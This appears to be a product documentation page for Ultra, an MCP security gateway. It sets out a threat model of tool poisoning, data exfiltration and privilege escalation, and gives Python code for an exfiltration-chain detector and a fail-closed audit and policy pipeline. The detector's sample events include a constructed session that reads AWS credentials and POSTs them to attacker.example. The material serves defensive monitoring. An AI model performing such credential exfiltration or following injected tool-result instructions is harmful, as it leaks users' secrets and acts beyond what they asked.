The Model Context Protocol (MCP) gives AI agents powerful capabilities — file system access, API calls, database queries, code execution. With that power comes risk. Ultra exists to bring visibility and control to MCP communications.

The MCP Threat Model

MCP servers grant AI agents access to sensitive systems. Without a security layer, several risks emerge:

Tool Poisoning

A malicious or compromised MCP server can return crafted tool descriptions or tool results that steer the agent. For example, a tool result can embed instructions that lead the agent to call other tools with parameters the user never asked for, and nothing in the protocol distinguishes that text from ordinary output.

Data Exfiltration

An AI agent with access to both a filesystem server and an HTTP server could read sensitive files and send their contents to an external endpoint, all within a single conversation. Neither call looks dangerous on its own; the risk is only visible when the two are seen together.

Privilege Escalation

MCP servers usually run as the local user, so they inherit that user’s full permissions. If a prompt-injected agent gets a server to execute arbitrary commands, those commands run with the user’s privileges, not with some narrower set granted to the agent.

Uncontrolled Tool Access

Without policy controls, any AI agent can call any tool on any connected MCP server. There’s no way to restrict which tools are available in which contexts (a scratch project versus a production-support workspace, for example).

Compliance Gaps

In regulated environments there’s no built-in audit trail of what AI agents do. When an agent modifies a production database or reads customer data, nothing records which client did it, when, or with what arguments.

What Ultra Provides Today

Ultra addresses these risks with a visibility-first approach:

Complete Audit Trail

Every MCP operation is recorded: tool calls, resource reads, prompt requests. The audit log captures who did what, when, and the full request/response payloads. The audit interceptor fails closed: if the audit record cannot be written, the request is rejected rather than forwarded, so no operation goes unrecorded.

Distributed Tracing

OpenTelemetry-compatible traces carrying W3C Trace Context IDs. Correlate MCP operations with your existing observability stack, and tie every tool call an agent makes during a session back to that session.
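The data exfiltration case above is only detectable because the audit log and trace IDs let you see two tool calls as one session. The following is an added example of that correlation, not Ultra’s code: it groups constructed audit events by trace ID and flags sessions where a file read is followed by a call that can send data off the host. The event shape, the tool and server names (`filesystem/read_file`, `http/fetch`), the sensitive-path list and the trusted-host list are all assumptions for the example.

```python
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass
from urllib.parse import urlparse

# Constructed audit events in the record shape this example assumes: one entry
# per tool call, each carrying the W3C trace ID of the agent session it belongs to.
# Two sessions: one reads AWS credentials and POSTs to an unknown host, the other
# reads a README and GETs an internal status endpoint.
SAMPLE_EVENTS = [
    {"trace_id": "4bf92f3577b34da6a3ce929d0e0e4736", "ts": 1, "client": "cursor",
     "server": "filesystem", "tool": "read_file",
     "args": {"path": "/home/alice/.aws/credentials"}},
    {"trace_id": "4bf92f3577b34da6a3ce929d0e0e4736", "ts": 2, "client": "cursor",
     "server": "http", "tool": "fetch",
     "args": {"url": "https://attacker.example/collect", "method": "POST", "body": "AKIA..."}},
    {"trace_id": "0af7651916cd43dd8448eb211c80319c", "ts": 1, "client": "claude-desktop",
     "server": "filesystem", "tool": "read_file",
     "args": {"path": "/home/alice/project/README.md"}},
    {"trace_id": "0af7651916cd43dd8448eb211c80319c", "ts": 2, "client": "claude-desktop",
     "server": "http", "tool": "fetch",
     "args": {"url": "https://api.internal.example/status", "method": "GET"}},
]

# Tool classification and sensitivity lists are assumptions for this example; a real
# deployment would derive them from the servers actually connected and from policy.
READ_TOOLS = {("filesystem", "read_file"), ("filesystem", "read_multiple_files")}
EGRESS_TOOLS = {("http", "fetch")}
SENSITIVE_PREFIXES = ("/home/alice/.aws", "/home/alice/.ssh", "/etc/")
TRUSTED_HOSTS = {"api.internal.example"}
WRITE_METHODS = {"POST", "PUT", "PATCH"}


@dataclass(frozen=True)
class Finding:
    trace_id: str
    client: str
    read_path: str
    egress_url: str
    severity: str  # "high" or "info"


def _is_sensitive(path: str) -> bool:
    return path.startswith(SENSITIVE_PREFIXES)


def _is_untrusted(url: str) -> bool:
    return urlparse(url).hostname not in TRUSTED_HOSTS


def find_exfil_chains(events: list[dict]) -> list[Finding]:
    """Flag traces in which a file read precedes a tool call that can send data out.

    Events are grouped by trace ID and ordered by timestamp, so a read in one
    session is never paired with an egress call from another. Severity is "high"
    when the read touched a sensitive path, the request can carry a body, and the
    target host is not trusted; every other read-then-send pair is reported as
    "info" so the baseline of normal chains stays visible.
    """
    by_trace: dict[str, list[dict]] = defaultdict(list)
    for ev in events:
        by_trace[ev["trace_id"]].append(ev)

    findings: list[Finding] = []
    for trace_id, evs in by_trace.items():
        evs.sort(key=lambda e: e["ts"])
        reads: list[dict] = []
        for ev in evs:
            key = (ev["server"], ev["tool"])
            if key in READ_TOOLS:
                reads.append(ev)
            elif key in EGRESS_TOOLS and reads:
                url = ev["args"]["url"]
                can_carry_body = ev["args"].get("method", "GET").upper() in WRITE_METHODS
                for read in reads:
                    path = read["args"]["path"]
                    high = _is_sensitive(path) and can_carry_body and _is_untrusted(url)
                    findings.append(Finding(trace_id, ev["client"], path, url,
                                            "high" if high else "info"))
    return findings


if __name__ == "__main__":
    for f in find_exfil_chains(SAMPLE_EVENTS):
        print(f"[{f.severity}] trace={f.trace_id} {f.client}: {f.read_path} -> {f.egress_url}")
```

Run against the constructed events, the credentials-then-POST session is reported as high and the README-then-GET session as info. The severity rule is deliberately conservative: a GET whose query string carries the file contents would only score as info here, so a production detector should also look at URL length and body size rather than the HTTP method alone.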

Real-Time Monitoring

The web dashboard provides live visibility into MCP traffic. See which tools are being called, which servers are active, and whether operations succeed or fail.

Centralized Visibility

Ultra Hub aggregates traces and audit events from all gateways across your organization. One dashboard for all MCP activity, across all developers and environments.

Client Identity Tracking

Ultra identifies which MCP client (Claude Desktop, Cursor, VS Code, etc.) made each request, providing context for security analysis.

What’s Coming

Ultra’s architecture is designed for policy enforcement. The pipeline’s interceptor pattern supports adding new processing stages without changing existing code.

Policy Engine (Planned)

An OPA/Rego-based policy engine that evaluates rules before requests reach upstream servers. This will enable:
  • Tool-level access controls (which tools can be called)
  • Parameter validation (what arguments are acceptable)
  • Rate limiting (how often tools can be called)
  • Context-based policies (different rules for different workspaces)
See Roadmap: Policy Engine for details.
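To make the interceptor pattern and the fail-closed audit behaviour concrete, here is an added example of a gateway pipeline, written for this page and not taken from Ultra. It chains an audit interceptor that refuses the request when the log sink fails with a policy interceptor implementing the four rule types listed above (tool allow-list, argument validation, rate limit, per-workspace context) in plain Python rather than the planned OPA/Rego. The `Request` fields, the `workspace` context key, the demo policy and the stand-in upstream are all assumptions.

```python
from __future__ import annotations

import time
from dataclasses import dataclass, field
from typing import Callable


@dataclass
class Request:
    workspace: str  # the context policies key on; an assumed field, not Ultra's schema
    client: str
    server: str
    tool: str
    args: dict


@dataclass
class Response:
    ok: bool
    body: dict = field(default_factory=dict)


# An interceptor receives the request and the next stage; it may short-circuit by
# returning its own Response instead of calling next_.
Handler = Callable[[Request], Response]
Interceptor = Callable[[Request, Handler], Response]


class AuditInterceptor:
    """Writes a record before and after the upstream call. Fail closed: if the
    sink cannot write the request record, the request is rejected, never forwarded."""

    def __init__(self, sink: Callable[[dict], None]):
        self.sink = sink

    def __call__(self, req: Request, next_: Handler) -> Response:
        record = {"ts": time.time(), "phase": "request", "workspace": req.workspace,
                  "client": req.client, "server": req.server, "tool": req.tool, "args": req.args}
        try:
            self.sink(record)
        except Exception as exc:  # any sink failure (disk full, hub unreachable) blocks the call
            return Response(False, {"error": f"audit unavailable, refusing request: {exc}"})
        resp = next_(req)
        try:
            self.sink({**record, "phase": "response", "ok": resp.ok, "body": resp.body})
        except Exception as exc:  # upstream already ran; surface the gap instead of hiding it
            return Response(False, {"error": f"response not audited: {exc}", "upstream": resp.body})
        return resp


@dataclass
class Policy:
    allowed_tools: dict[str, set[tuple[str, str]]]                   # workspace -> {(server, tool)}
    validators: dict[tuple[str, str], Callable[[dict], str | None]]  # returns a reason to deny
    rate_limit: tuple[int, float]                                    # (max calls, window seconds)


class PolicyInterceptor:
    """Tool allow-list, argument validation and a sliding-window rate limit, keyed
    by workspace. Plain Python standing in for the planned Rego rules."""

    def __init__(self, policy: Policy, clock: Callable[[], float] = time.monotonic):
        self.policy, self.clock = policy, clock
        self._calls: dict[tuple[str, str, str], list[float]] = {}

    def __call__(self, req: Request, next_: Handler) -> Response:
        key = (req.server, req.tool)
        if key not in self.policy.allowed_tools.get(req.workspace, set()):
            return Response(False, {"error": f"{req.server}/{req.tool} not allowed in {req.workspace}"})
        validate = self.policy.validators.get(key)
        if validate and (reason := validate(req.args)):
            return Response(False, {"error": f"argument rejected: {reason}"})
        limit, window = self.policy.rate_limit
        now = self.clock()
        bucket = self._calls.setdefault((req.workspace, *key), [])
        bucket[:] = [t for t in bucket if now - t < window]  # drop calls outside the window
        if len(bucket) >= limit:
            return Response(False, {"error": "rate limit exceeded"})
        bucket.append(now)
        return next_(req)


def build_pipeline(interceptors: list[Interceptor], upstream: Handler) -> Handler:
    """Chain interceptors so the first in the list runs outermost."""
    handler = upstream
    for ic in reversed(interceptors):
        handler = lambda req, ic=ic, nxt=handler: ic(req, nxt)
    return handler


def _no_dotfiles(args: dict) -> str | None:
    path = str(args.get("path", ""))
    return "hidden file or directory" if "/." in path or path.startswith(".") else None


# Demo policy (assumed): dev may read files and fetch URLs, prod-support may only read.
DEMO_POLICY = Policy(
    allowed_tools={"dev": {("filesystem", "read_file"), ("http", "fetch")},
                   "prod-support": {("filesystem", "read_file")}},
    validators={("filesystem", "read_file"): _no_dotfiles},
    rate_limit=(3, 60.0),
)


def make_gateway(audit_log: list[dict], sink_fails: bool = False,
                 clock: Callable[[], float] = time.monotonic) -> Handler:
    """Audit sits outermost so denied requests are recorded too."""
    def sink(rec: dict) -> None:
        if sink_fails:
            raise RuntimeError("audit disk full")
        audit_log.append(rec)

    def upstream(req: Request) -> Response:  # stands in for the real MCP server
        return Response(True, {"result": f"{req.tool} executed"})

    return build_pipeline([AuditInterceptor(sink), PolicyInterceptor(DEMO_POLICY, clock)], upstream)
```

Ordering matters: the audit interceptor is placed first so that a request the policy stage denies still produces a request and a response record, which is what an investigator needs when asking why an agent’s call failed. With the sink made to fail, the same request is refused before reaching the policy stage or the upstream server.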

The Honest Assessment

Ultra today provides observability, not enforcement. You can see everything that happens, but you can’t yet block specific actions. We believe this is the right starting point:
  1. You can’t secure what you can’t see. Most organizations don’t even know what their AI agents are doing. Ultra fixes that immediately.
  2. Audit trails have immediate compliance value. Even without enforcement, a complete audit log satisfies many regulatory requirements.
  3. Observability informs policy. Understanding actual usage patterns is essential for writing effective policies. Block-first approaches tend to break workflows.
Policy enforcement is the next step, and it’s built on the foundation of observability that Ultra provides today.